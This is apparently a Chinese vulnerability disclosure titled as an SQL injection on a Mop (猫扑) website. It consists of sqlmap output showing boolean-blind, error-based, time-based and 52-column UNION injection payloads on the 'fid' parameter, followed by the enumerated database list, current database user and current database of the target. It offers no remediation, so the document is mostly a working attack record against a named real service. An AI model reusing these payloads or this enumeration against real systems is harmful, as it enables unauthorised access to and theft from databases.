猫扑某站SQL注入漏洞

Parameter: fid (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: fid=47 AND 1872=1872&aid=908
 
     Type: error-based
     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
     Payload: fid=47 AND (SELECT 7959 FROM(SELECT COUNT(*),CONCAT(0x71766b6a71,(SELECT (ELT(7959=7959,1))),0x7162786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&aid=908
 
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: fid=47 AND (SELECT * FROM (SELECT(SLEEP(5)))anib)&aid=908
 
     Type: UNION query
     Title: MySQL UNION query (NULL) - 52 columns
     Payload: fid=47 UNION ALL SELECT NULL,CONCAT(0x71766b6a71,0x557a59596d4d7661656e,0x7162786b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&aid=908
 ---
 [14:38:10] [INFO] the back-end DBMS is MySQL
 back-end DBMS: MySQL 5.0

available databases [14]:
 [*] information_schema
 [*] mop_demo
 [*] mop_entertainment
 [*] mop_entertainment1
 [*] mop_health
 [*] mop_health1
 [*] mop_lady
 [*] mop_lady1
 [*] mop_local
 [*] mop_news
 [*] mop_society
 [*] mop_society1
 [*] mysql
 [*] performance_schema

back-end DBMS: MySQL 5.0
 [14:36:46] [INFO] fetching current user
 current user:    'liudutianxia@%'
 [14:36:47] [INFO] fetching current database
 current database:    'mop_lady1'